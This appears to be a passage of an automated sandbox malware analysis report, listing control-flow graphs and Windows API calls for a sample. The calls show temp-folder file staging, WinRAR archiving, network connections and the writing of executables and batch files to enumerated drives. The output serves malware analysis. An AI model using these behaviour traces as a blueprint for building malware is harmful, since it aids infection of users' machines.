                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004021E6
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00402207
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\), ref: 00402215
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 00402223
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00402230
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.rar), ref: 0040223E
                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00402247
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 0040225C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 00402278
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 004022B0
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 004022D3
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040230D
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 00402333
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00402350
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,047E50D0,?,00000000), ref: 0040238D
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00402396
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 004023CC
                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 004023E2
                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 004023EF
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,C:\Program Files (x86)\\WinRAR\rar.exe,?,?,00000000), ref: 00402420
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00402451
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$lstrcat$Sleep$lstrcpy$Attributes$CloseCopyDeleteHandlelstrlen$CreateExecuteShellWritewsprintf
                                                                                                                                                                                                                                                      • String ID: .exe$.rar$C:\Program Files (x86)\\WinRAR\rar.exe$C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\$C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\$C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe$a "..\%s.rar" * $tmp
                                                                                                                                                                                                                                                      • API String ID: 1896541782-3258481087
                                                                                                                                                                                                                                                      • Opcode ID: 24f4ff6158e3481e03426d39612af95b35a73f31ff751169f6e5986fea90d1b9
                                                                                                                                                                                                                                                      • Instruction ID: 3022652ca617998f224523417b6a8ac86932b041dbb7c5d2648501ab9886e0b1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24f4ff6158e3481e03426d39612af95b35a73f31ff751169f6e5986fea90d1b9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07C1E071940348EBDF21EBE0DD89ADA7B6CAB05304F4044BBE504A7191E6BD5A8DCF29

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 745 40fb2f-40fb56 call 421df0 call 40ea9f 750 40ffc6-40ffca 745->750 751 40fb5c-40fb9e socket call 4138bc htons connect 745->751 754 40fba4-40fc19 call 413410 wsprintfA lstrlenA send call 421c60 751->754 755 40feb6-40fec1 closesocket 751->755 761 40fc1c-40fc57 select __WSAFDIsSet 754->761 756 40ffc3-40ffc5 755->756 756->750 761->755 762 40fc5d-40fc75 recv 761->762 762->755 763 40fc7b-40fc81 762->763 764 40fc83-40fc86 763->764 765 40fcae-40fcd3 call 40ec29 763->765 767 40fca6-40fca9 764->767 768 40fc88-40fc90 764->768 765->755 771 40fcd9-40fd04 call 421c60 call 421f60 765->771 767->761 768->767 770 40fc92-40fc9a 768->770 770->767 772 40fc9c-40fca4 770->772 771->755 777 40fd0a-40fd1c call 421f60 771->777 772->765 772->767 777->755 780 40fd22-40fd30 call 42203e 777->780 780->755 783 40fd36-40fd44 call 421f60 780->783 783->755 786 40fd4a-40fd5d lstrcmpiA 783->786 787 40fd68-40fd72 lstrcmpiA 786->787 788 40fd5f-40fd63 786->788 790 40fd74-40fd78 787->790 791 40fd7d-40fd87 lstrcmpiA 787->791 789 40fe35-40fe39 788->789 789->755 794 40fe3b-40fe48 call 421f60 789->794 790->789 792 40fd92-40fd9c lstrcmpiA 791->792 793 40fd89-40fd8d 791->793 795 40fda7-40fdb1 lstrcmpiA 792->795 796 40fd9e-40fda2 792->796 793->789 794->755 803 40fe4a-40fe5c call 42203e 794->803 798 40fdb3-40fdb7 795->798 799 40fdb9-40fdc3 lstrcmpiA 795->799 796->789 798->789 801 40fdc5-40fdc9 799->801 802 40fdcb-40fdd5 lstrcmpiA 799->802 801->789 804 40fdd7-40fddb 802->804 805 40fddd-40fde7 lstrcmpiA 802->805 803->755 810 40fe5e-40fe70 call 421f60 803->810 804->789 807 40fde9-40fded 805->807 808 40fdef-40fdf9 lstrcmpiA 805->808 807->789 811 40fe01-40fe0b lstrcmpiA 808->811 812 40fdfb-40fdff 808->812 810->755 819 40fe72-40fe84 call 42203e 810->819 814 40fe13-40fe1d lstrcmpiA 811->814 815 40fe0d-40fe11 811->815 812->789 817 40fe25-40fe2f lstrcmpiA 814->817 818 40fe1f-40fe23 814->818 815->789 817->789 820 40fe31 817->820 818->789 819->755 823 40fe86-40fe93 call 421f60 819->823 820->789 823->755 826 40fe95-40fea3 call 42203e 823->826 826->755 829 40fea5-40feb4 call 421f60 826->829 829->755 832 40fec6-40fee1 call 42203e 829->832 835 40fee3-40fef0 832->835 836 40ff15-40ff1e 832->836 837 40fef2-40fef5 835->837 838 40fef7 835->838 839 40ff20-40ff23 836->839 840 40ff96-40ffc1 closesocket 836->840 841 40fefc-40ff00 837->841 838->841 842 40ff25-40ff28 839->842 843 40ff8a 839->843 840->756 844 40ff02-40ff08 841->844 845 40ff0a 841->845 842->843 846 40ff2a-40ff2d 842->846 847 40ff8d-40ff94 843->847 848 40ff10-40ff13 844->848 845->848 846->843 849 40ff2f-40ff32 846->849 847->839 847->840 848->835 848->836 849->843 850 40ff34-40ff37 849->850 850->843 851 40ff39-40ff3c 850->851 851->843 852 40ff3e-40ff41 851->852 852->843 853 40ff43-40ff46 852->853 854 40ff85-40ff88 853->854 855 40ff48-40ff4b 853->855 854->847 855->854 856 40ff4d-40ff50 855->856 856->854 857 40ff52-40ff55 856->857 857->854 858 40ff57-40ff5a 857->858 858->847 859 40ff5c-40ff69 858->859 860 40ff70 859->860 861 40ff6b-40ff6e 859->861 862 40ff75-40ff79 860->862 861->862 863 40ff80-40ff83 862->863 864 40ff7b-40ff7e 862->864 863->847 864->847
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0040EA9F: lstrlenA.KERNEL32(?,?), ref: 0040EB2B
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040FB65
                                                                                                                                                                                                                                                        • Part of subcall function 004138BC: inet_addr.WS2_32(00000000), ref: 004138C0
                                                                                                                                                                                                                                                        • Part of subcall function 004138BC: gethostbyname.WS2_32(?), ref: 004138CF
                                                                                                                                                                                                                                                      • htons.WS2_32(00000050), ref: 0040FB83
                                                                                                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 0040FB96
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040FBD0
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 0040FBE3
                                                                                                                                                                                                                                                      • send.WS2_32(?,?,00000000), ref: 0040FBF4
                                                                                                                                                                                                                                                      • select.WS2_32(?,?,00000000,00000000,?), ref: 0040FC3E
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(?,00000001), ref: 0040FC4E
                                                                                                                                                                                                                                                      • recv.WS2_32(?,?,00000001,00000000), ref: 0040FC6C
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000001,jan), ref: 0040FD59
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000001,feb), ref: 0040FD6E
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000001,mar), ref: 0040FD83
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000001,apr), ref: 0040FD98
                                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 0040FEB9
                                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 0040FF99
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcmpi$closesocketlstrlen$connectgethostbynamehtonsinet_addrrecvselectsendsocketwsprintf
                                                                                                                                                                                                                                                      • String ID: apr$aug$date$dec$feb$jan$jul$jun$mar$may$nov$oct$sep
                                                                                                                                                                                                                                                      • API String ID: 4061257364-2825898416
                                                                                                                                                                                                                                                      • Opcode ID: 1b869073f7bf14742d9279ac740fefc2c549dc5633a0fcad0a972a6c5c4af714
                                                                                                                                                                                                                                                      • Instruction ID: b440cbbe22d014a8756bf6f11b7a8553ac34d49057fa62a6aabe9826c51b07e3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b869073f7bf14742d9279ac740fefc2c549dc5633a0fcad0a972a6c5c4af714
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95D14B3160435A9ADB315A259C44BBF37A89F16344F68007BFD05F26D3EA7CC84A876E

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 865 407df4-407e0a call 421df0 868 407e17-407e1e 865->868 869 407e20-407e37 868->869 870 407e0c-407e11 Sleep 868->870 871 407e44-407e4b 869->871 870->868 872 407e39-407e3e Sleep 871->872 873 407e4d-407eba lstrcpyA lstrlenA call 413663 lstrcatA call 4079cf lstrcatA 871->873 872->871 878 408312-408319 873->878 879 407ebf-407eeb GetTickCount call 421d78 GetLogicalDriveStringsA 878->879 880 40831f 878->880 883 407ef1-407efe GetDriveTypeA 879->883 884 4082c7-4082e9 call 421c60 879->884 880->868 886 4082b3-4082c1 lstrlenA 883->886 887 407f04-407f13 883->887 890 408303-408305 884->890 886->883 886->884 887->886 889 407f19-407f1c 887->889 889->886 891 407f22-407f25 889->891 893 408307-40830c Sleep 890->893 894 4082eb-408301 lstrlenA 890->894 891->886 892 407f2b-407f48 call 421e30 891->892 897 407f9a-408063 call 421e30 lstrlenA call 4136ff call 413663 lstrcatA call 4136ff call 413663 lstrcatA call 4136ff call 413663 lstrcatA lstrcpyA call 407b8f 892->897 898 407f4a-407f6c lstrcatA call 407b8f 892->898 893->878 894->890 925 408072-408090 lstrcpyA call 407b8f 897->925 926 408065-408071 call 414d8e 897->926 904 407f7b-407f97 call 421e30 call 407d1e 898->904 905 407f6e-407f7a call 414d8e 898->905 904->897 905->904 931 408092-40809e call 414d8e 925->931 932 40809f-4080bd lstrcpyA call 407b8f 925->932 926->925 931->932 937 4080cc-40815a call 413663 call 421e30 call 413410 lstrcatA SetFileAttributesA CreateFileA 932->937 938 4080bf-4080cb call 414d8e 932->938 947 40815c-408165 937->947 948 40819f-40829d call 421d82 * 7 call 413410 wsprintfA lstrlenA WriteFile CloseHandle call 414d8e call 413aac 937->948 938->937 949 408195-408199 947->949 950 408167-408193 Sleep CreateFileA 947->950 971 4082a2-4082a3 948->971 949->948 952 4082a4-4082ad SetFileAttributesA 949->952 950->947 950->949 952->886 971->952
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 00407E11
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00407E3E
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\), ref: 00407E59
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,0000000A), ref: 00407E68
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.exe), ref: 00407E8A
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.exe), ref: 00407EA1
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00407EBF
                                                                                                                                                                                                                                                      • GetLogicalDriveStringsA.KERNEL32(000003FF,?), ref: 00407ED8
                                                                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(00000000), ref: 00407EF2
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00407F58
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00407FB2
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.bat), ref: 00407FED
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.bat), ref: 00408015
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.bat), ref: 0040803D
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0040804F
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 004080A9
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,0000001F), ref: 00408121
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,0000001F), ref: 00408130
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,0000001F), ref: 0040814E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,0000001F), ref: 0040816C
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,0000001F), ref: 00408187
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00408254
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 0040826A
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000), ref: 0040827B
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00408284
                                                                                                                                                                                                                                                        • Part of subcall function 00413AAC: GetTickCount.KERNEL32 ref: 00413AB3
                                                                                                                                                                                                                                                        • Part of subcall function 00413AAC: GetSystemTime.KERNEL32(?,?,00407BCE,047E50D0,00408C5D,00408C5D,76AE8A60,00408C5D,?,00000000), ref: 00413AC4
                                                                                                                                                                                                                                                        • Part of subcall function 00413AAC: SystemTimeToFileTime.KERNEL32(000007D9,00408C5D), ref: 00413AFD
                                                                                                                                                                                                                                                        • Part of subcall function 00413AAC: SystemTimeToFileTime.KERNEL32(000007D9,?), ref: 00413B40
                                                                                                                                                                                                                                                        • Part of subcall function 00413AAC: SystemTimeToFileTime.KERNEL32(000007D9,76AE8A60), ref: 00413B8E
                                                                                                                                                                                                                                                        • Part of subcall function 00413AAC: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000), ref: 00413BA5
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0040807C
                                                                                                                                                                                                                                                        • Part of subcall function 00414D8E: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0040D2A9,00000000), ref: 00414DA4
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000007), ref: 004082AD
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 004082B4
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32 ref: 004082F7
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040830C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Timelstrcat$lstrlen$CreateSleepSystemlstrcpy$AttributesCountDriveTick$CloseHandleLogicalStringsTypeWritewsprintf
                                                                                                                                                                                                                                                      • String ID: .bat$.exe$C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\
                                                                                                                                                                                                                                                      • API String ID: 530435527-4043645035
                                                                                                                                                                                                                                                      • Opcode ID: cebe2707939c58bdb77b2f4b12f498b91be35d01fc9f4acf54c70fc7af8dec7d
                                                                                                                                                                                                                                                      • Instruction ID: c6ce981036597e7e3b7541c0c98113c6be5eba37bc76b6932f84717924a43464
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cebe2707939c58bdb77b2f4b12f498b91be35d01fc9f4acf54c70fc7af8dec7d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11D1B8B2D0011CAADB25DBA0DC4AFEA77BDAB44314F5404ABF504E2181DA789F858F69

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 972 4157a7-4157cc call 421df0 GetTickCount call 421d78 977 4157d5-4157dc 972->977 978 4157ce-4157d3 Sleep 977->978 979 4157de-4157ff call 415755 977->979 978->977 982 415802-41581f Sleep 979->982 983 415b05-415b2a ShowWindow GetWindowThreadProcessId GetCurrentProcess SetPriorityClass 982->983 984 415825 982->984 985 415b30-415b4a Sleep call 40245c 983->985 986 41582c-415839 Sleep call 412c9d 984->986 992 415b4c-415b54 985->992 989 41583e-415843 986->989 989->986 991 415845-41585e GetCurrentProcess SetPriorityClass 989->991 993 415860-41586d call 421d82 991->993 994 415874-41587b 991->994 992->982 993->994 996 41587d-4158a2 lstrcpyA call 414af0 994->996 997 4158fc-415921 call 402f35 994->997 1005 4158a4-4158c3 lstrlenA wsprintfA 996->1005 1006 4158c6-4158fa lstrcatA call 4136ff lstrlenA call 413663 996->1006 1003 415927 997->1003 1004 4159ca-4159d4 997->1004 1007 41592a-415937 GetWindowRect 1003->1007 1008 415827 1004->1008 1009 4159da 1004->1009 1005->1006 1006->1007 1011 4159a0-4159a7 1007->1011 1012 415939-415999 call 4152ab call 41413a * 9 Sleep call 4153e2 1007->1012 1008->986 1009->983 1011->983 1015 4159ad-4159b0 1011->1015 1043 41599b 1012->1043 1044 4159df-415afe call 4152ab call 415385 ShowWindow Sleep ShowWindow call 415434 call 4152ab call 415497 call 415104 call 415623 ShowWindow Sleep call 4152ab call 4154d8 ShowWindow Sleep call 4152ab call 415547 ShowWindow Sleep call 4152ab call 4155b7 ShowWindow 1012->1044 1018 4159b9-4159c8 call 415755 1015->1018 1018->1004 1024 4159b2-4159b7 Sleep 1018->1024 1024->1018 1043->1011 1044->983
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004157B9
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 004157D3
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00415816
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041582D
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000080), ref: 0041584A
                                                                                                                                                                                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 00415851
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,http://), ref: 00415886
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,:%d,?), ref: 004158B2
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004158BD
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A7D8), ref: 004158CF
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000002), ref: 004158E8
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041592F
                                                                                                                                                                                                                                                        • Part of subcall function 00402F35: lstrcpynA.KERNEL32(?,00000001,0000001E,?,?,76AF0F00), ref: 00402FB3
                                                                                                                                                                                                                                                        • Part of subcall function 00402F35: lstrcpynA.KERNEL32(00000000,0042A44C,0000001E,?,?,76AF0F00), ref: 00402FC3
                                                                                                                                                                                                                                                        • Part of subcall function 00402F35: lstrcpynA.KERNEL32(?,00000000,0000001E,?,?,76AF0F00), ref: 00402FD3
                                                                                                                                                                                                                                                        • Part of subcall function 00402F35: lstrcpynA.KERNEL32(?,00000000,0000003E,?,?,76AF0F00), ref: 00402FE3
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 00415984
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00004E20), ref: 004159B7
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: GetDesktopWindow.USER32 ref: 004152B8
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: GetWindowRect.USER32(00000000), ref: 004152C5
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: GetWindowRect.USER32(00415941,?), ref: 004152CF
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: ShowWindow.USER32(00415941,00000001), ref: 0041532A
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetWindowPos.USER32(00415941,000000FF,?,00000000,00000258,000001F4,00000040), ref: 00415342
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: ShowWindow.USER32(00415941,00000001), ref: 0041534B
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetForegroundWindow.USER32(00415941), ref: 00415358
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetFocus.USER32(00415941), ref: 00415361
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetForegroundWindow.USER32(00415941), ref: 00415364
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetFocus.USER32(00415941), ref: 00415367
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetForegroundWindow.USER32(00415941), ref: 0041536A
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetFocus.USER32(00415941), ref: 0041536D
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: Sleep.KERNEL32(00000064), ref: 00415371
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: ShowWindow.USER32(00415941,00000001), ref: 0041537A
                                                                                                                                                                                                                                                        • Part of subcall function 00415497: Sleep.KERNEL32(00000064,?,00415A60,?,00000000), ref: 004154A0
                                                                                                                                                                                                                                                        • Part of subcall function 00415497: SetFocus.USER32(?), ref: 004154B0
                                                                                                                                                                                                                                                        • Part of subcall function 00415497: Sleep.KERNEL32(00000064), ref: 004154B8
                                                                                                                                                                                                                                                        • Part of subcall function 00415497: Sleep.KERNEL32(00000064), ref: 004154C1
                                                                                                                                                                                                                                                        • Part of subcall function 00415104: lstrlenA.KERNEL32(?,?,?,76AF0F00), ref: 00415114
                                                                                                                                                                                                                                                        • Part of subcall function 00415104: lstrlenA.KERNEL32(-00000005), ref: 00415209
                                                                                                                                                                                                                                                        • Part of subcall function 00415104: lstrlenA.KERNEL32(-00000005), ref: 00415211
                                                                                                                                                                                                                                                        • Part of subcall function 00415623: lstrlenA.KERNEL32(?,?,76AF0F00), ref: 00415665
                                                                                                                                                                                                                                                        • Part of subcall function 00415623: lstrlenA.KERNEL32(?), ref: 0041566D
                                                                                                                                                                                                                                                        • Part of subcall function 00415623: lstrlenA.KERNEL32(?), ref: 004156C9
                                                                                                                                                                                                                                                        • Part of subcall function 00415623: lstrcatA.KERNEL32(?,0042A440), ref: 004156E0
                                                                                                                                                                                                                                                        • Part of subcall function 00415623: lstrcatA.KERNEL32(?,00000000), ref: 004156E7
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 004159F9
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 00415A04
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00415A09
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00415A89
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000190), ref: 00415A95
                                                                                                                                                                                                                                                        • Part of subcall function 004154D8: SetFocus.USER32(?,?,?,00000190,?,76AF0F00,?,?,?,?,?,?,?,?,00415AAB,?), ref: 00415516
                                                                                                                                                                                                                                                        • Part of subcall function 004154D8: Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,00000190,?), ref: 00415539
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00415AB1
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000190), ref: 00415AB8
